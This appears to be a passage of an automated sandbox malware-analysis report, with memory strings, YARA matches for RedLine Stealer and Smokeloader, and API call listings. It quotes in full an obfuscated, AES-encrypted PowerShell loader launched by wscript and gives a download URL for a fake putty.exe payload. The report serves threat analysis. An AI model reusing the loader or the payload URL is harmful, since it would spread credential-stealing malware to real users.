                Source: powershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/yumba/putty.ex
                Source: powershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/yumba/putty.exe
                Source: powershell.exe, 00000002.00000002.1561572514.0000022BDEAD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/yumba/putty.exep
                Source: powershell.exe, 00000002.00000002.1561572514.0000022BDEAD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: explorer.exe, 00000005.00000000.1622386973.0000000009237000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
                Source: explorer.exe, 00000005.00000000.1624538584.000000000BCA8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
                Source: powershell.exe, 00000002.00000002.1561572514.0000022BDE8B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: explorer.exe, 00000005.00000000.1624538584.000000000BCA8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                Source: explorer.exe, 00000005.00000000.1624538584.000000000BCA8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSA4
                Source: explorer.exe, 00000005.00000000.1624538584.000000000BCA8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSd
                Source: explorer.exe, 00000005.00000000.1620819435.000000000702D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
                Source: explorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                Source: explorer.exe, 00000005.00000000.1622386973.00000000090DA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
                Source: explorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0E948A694F8C48079B908C8EA9DDF9EA&timeOut=5000&oc
                Source: explorer.exe, 00000005.00000000.1622386973.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
                Source: explorer.exe, 00000005.00000000.1622386973.00000000091FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
                Source: explorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
                Source: explorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
                Source: explorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
                Source: explorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
                Source: explorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
                Source: explorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
                Source: explorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
                Source: explorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
                Source: explorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k
                Source: explorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark
                Source: explorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA
                Source: explorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark
                Source: powershell.exe, 00000002.00000002.1561572514.0000022BE04F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000002.00000002.1561572514.0000022BE04F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000002.00000002.1561572514.0000022BE04F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: explorer.exe, 00000005.00000000.1624538584.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                Source: powershell.exe, 00000002.00000002.1561572514.0000022BDEAD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: explorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
                Source: explorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
                Source: explorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1b2aMG.img
                Source: explorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
                Source: explorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
                Source: explorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
                Source: explorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
                Source: explorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYTL1i.img
                Source: powershell.exe, 00000002.00000002.1578053595.0000022BEE91C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1561572514.0000022BE04F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: explorer.exe, 00000005.00000000.1624538584.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
                Source: explorer.exe, 00000005.00000000.1624538584.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comer
                Source: explorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
                Source: explorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
                Source: explorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
                Source: explorer.exe, 00000005.00000000.1624538584.000000000BDF5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/EM0
                Source: explorer.exe, 00000005.00000000.1624538584.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com48
                Source: explorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
                Source: explorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
                Source: explorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1
                Source: explorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
                Source: explorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
                Source: explorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
                Source: explorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/predicting-what-the-pac-12-would-look-like-after-expansion-wi
                Source: explorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
                Source: explorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin
                Source: explorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
                Source: explorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
                Source: explorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
                Source: explorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
                Source: explorer.exe, 00000005.00000000.1620819435.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: Yara matchFile source: 4.2.putty.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.3.edrecib.5c0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.3.putty.exe.600000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.edrecib.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.putty.exe.5f0e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.edrecib.5b0e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.1638027397.0000000000731000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1858830240.0000000000981000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1636745792.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.1568194811.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000003.1807981755.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1858680191.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: 00000004.00000002.1635941173.0000000000530000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000004.00000002.1638027397.0000000000731000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000007.00000002.1858608967.0000000000530000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000007.00000002.1858830240.0000000000981000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000004.00000002.1636745792.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000007.00000002.1858660361.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000004.00000002.1636678804.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000007.00000002.1858680191.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: Process Memory Space: powershell.exe PID: 6012, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\putty.exeJump to dropped file
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function kzVl($BRaA){return -split ($BRaA -replace '..', '0x$& ')};$Qiyjc = kzVl('583A9978E4D34538992E1A1351EF94C76F346575AEA09EB513401549161877EAF16C217FA53FAF8E9F5A6B6C98F436132CD64686F84B385701DF5CB57A496A57D083A739BD167A16F22386779010D0352280C205381DB165BF369C1DDC1AB0B20826DFB010CFDDCDFA3710E79E1F0DF5396A3CDCB1519A0E59214CB85DD8D5DB3598F5C3CC2D2307A104A5856E89829E0A80D0286C7C00A59C9857283FBDB29EB8E496DD4C09DA9F275960328E5AC89D55EBD3DCFED16A96B6882267D9DCBB1521E1A44EEC3CE3DA70C185B6D12547011407D8226CD2AE3CE2F55821F81B446119C95B163DB7DC61D936658509E877C1C06861FB6361BE198E404AE7F361887E373DC1A99E729EA6BCAD34C16C098676CBD7B34C34B4F6155017983594876DAC6BDB2C587F4A232BC97779B63E1A9088C50429F113E053CF31D6547C6D7F0ABE12F1F0B6A3F596803EBE69B5D5A6D1179C28BCAA989E167C59B3FF802844CBD654C0D6740476BF8F45699EB7ADB664C116B89504C4839F998A91C64E5E71E61B29061402831AAC2A34042CD38B595CF64B56303C0B9F31CEFD6C1F6AFD8BEDDEA69D470D2A173FC1496F22674C3559B74CED02F1DCEC4DABB38BA293DA8F762959B7DDA301EEA24D6B450354B04288F6385A2B2EDB10FA89F0D27FF2907D00A53F937FD89AB58F6811A166D5A633234208A16F44C7E1FDA1CA5781750D0FD0698B225A66882E2BC56217A52CCBF79E80ED2ABC2CDC8039511450AF5B112EADDA510CE1EED99D3EBFDAD959AB50B58880B9E56EC313C6B087C011B3DA810C2A5E3C6A90C69061B7B3ECED35C713C11874F6763FA79F0691D4FF8B99159BF1A716F811E9CBB8F818216B8AEF751BF044FBFE9DAA0CB892645C05F5D407EFED774BA5689A68FE5547020C0FE72F39D5ACA4');$mZBMz=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((kzVl('72786673574B4C516874716D49544E50')),[byte[]]::new(16)).TransformFinalBlock($Qiyjc,0,$Qiyjc.Length)); & $mZBMz.Substring(0,3) $mZBMz.Substring(3)
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function kzVl($BRaA){return -split ($BRaA -replace '..', '0x$& ')};$Qiyjc = kzVl('583A9978E4D34538992E1A1351EF94C76F346575AEA09EB513401549161877EAF16C217FA53FAF8E9F5A6B6C98F436132CD64686F84B385701DF5CB57A496A57D083A739BD167A16F22386779010D0352280C205381DB165BF369C1DDC1AB0B20826DFB010CFDDCDFA3710E79E1F0DF5396A3CDCB1519A0E59214CB85DD8D5DB3598F5C3CC2D2307A104A5856E89829E0A80D0286C7C00A59C9857283FBDB29EB8E496DD4C09DA9F275960328E5AC89D55EBD3DCFED16A96B6882267D9DCBB1521E1A44EEC3CE3DA70C185B6D12547011407D8226CD2AE3CE2F55821F81B446119C95B163DB7DC61D936658509E877C1C06861FB6361BE198E404AE7F361887E373DC1A99E729EA6BCAD34C16C098676CBD7B34C34B4F6155017983594876DAC6BDB2C587F4A232BC97779B63E1A9088C50429F113E053CF31D6547C6D7F0ABE12F1F0B6A3F596803EBE69B5D5A6D1179C28BCAA989E167C59B3FF802844CBD654C0D6740476BF8F45699EB7ADB664C116B89504C4839F998A91C64E5E71E61B29061402831AAC2A34042CD38B595CF64B56303C0B9F31CEFD6C1F6AFD8BEDDEA69D470D2A173FC1496F22674C3559B74CED02F1DCEC4DABB38BA293DA8F762959B7DDA301EEA24D6B450354B04288F6385A2B2EDB10FA89F0D27FF2907D00A53F937FD89AB58F6811A166D5A633234208A16F44C7E1FDA1CA5781750D0FD0698B225A66882E2BC56217A52CCBF79E80ED2ABC2CDC8039511450AF5B112EADDA510CE1EED99D3EBFDAD959AB50B58880B9E56EC313C6B087C011B3DA810C2A5E3C6A90C69061B7B3ECED35C713C11874F6763FA79F0691D4FF8B99159BF1A716F811E9CBB8F818216B8AEF751BF044FBFE9DAA0CB892645C05F5D407EFED774BA5689A68FE5547020C0FE72F39D5ACA4');$mZBMz=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((kzVl('72786673574B4C516874716D49544E50')),[byte[]]::new(16)).TransformFinalBlock($Qiyjc,0,$Qiyjc.Length)); & $mZBMz.Substring(0,3) $mZBMz.Substring(3)Jump to behavior
                Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_00402F8F RtlCreateUserThread,NtTerminateProcess,4_2_00402F8F
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_004013BF NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004013BF
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_00401412 NtAllocateVirtualMemory,4_2_00401412
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_004013CA NtAllocateVirtualMemory,4_2_004013CA
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_004014D3 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004014D3
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_004013D9 NtAllocateVirtualMemory,4_2_004013D9
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_004013E0 NtAllocateVirtualMemory,4_2_004013E0
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_004013F0 NtAllocateVirtualMemory,4_2_004013F0
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_004013F4 NtAllocateVirtualMemory,4_2_004013F4
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_004014F7 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004014F7
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_004014B5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004014B5
                Source: C:\Users\user\AppData\Roaming\edrecibCode function: 7_2_00402F8F RtlCreateUserThread,NtTerminateProcess,7_2_00402F8F
                Source: C:\Users\user\AppData\Roaming\edrecibCode function: 7_2_004013BF NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004013BF
                Source: C:\Users\user\AppData\Roaming\edrecibCode function: 7_2_00401412 NtAllocateVirtualMemory,7_2_00401412
                Source: C:\Users\user\AppData\Roaming\edrecibCode function: 7_2_004013CA NtAllocateVirtualMemory,7_2_004013CA
                Source: C:\Users\user\AppData\Roaming\edrecibCode function: 7_2_004014D3 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004014D3
                Source: C:\Users\user\AppData\Roaming\edrecibCode function: 7_2_004013D9 NtAllocateVirtualMemory,7_2_004013D9
                Source: C:\Users\user\AppData\Roaming\edrecibCode function: 7_2_004013E0 NtAllocateVirtualMemory,7_2_004013E0
                Source: C:\Users\user\AppData\Roaming\edrecibCode function: 7_2_004013F0 NtAllocateVirtualMemory,7_2_004013F0
                Source: C:\Users\user\AppData\Roaming\edrecibCode function: 7_2_004013F4 NtAllocateVirtualMemory,7_2_004013F4
                Source: C:\Users\user\AppData\Roaming\edrecibCode function: 7_2_004014F7 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004014F7
                Source: C:\Users\user\AppData\Roaming\edrecibCode function: 7_2_004014B5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004014B5
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_0040D2414_2_0040D241
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_0041180C4_2_0041180C
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_004132114_2_00413211
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_004112C84_2_004112C8
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_00411D504_2_00411D50
                Source: C:\Users\user\AppData\Roaming\edrecibCode function: 7_2_0040D2417_2_0040D241
                Source: C:\Users\user\AppData\Roaming\edrecibCode function: 7_2_0041180C7_2_0041180C
                Source: C:\Users\user\AppData\Roaming\edrecibCode function: 7_2_004132117_2_00413211
                Source: C:\Users\user\AppData\Roaming\edrecibCode function: 7_2_004112C87_2_004112C8
                Source: C:\Users\user\AppData\Roaming\edrecibCode function: 7_2_00411D507_2_00411D50
                Source: 00000004.00000002.1635941173.0000000000530000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000004.00000002.1638027397.0000000000731000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000007.00000002.1858608967.0000000000530000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000007.00000002.1858830240.0000000000981000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000004.00000002.1636745792.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000007.00000002.1858660361.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000004.00000002.1636678804.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000007.00000002.1858680191.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
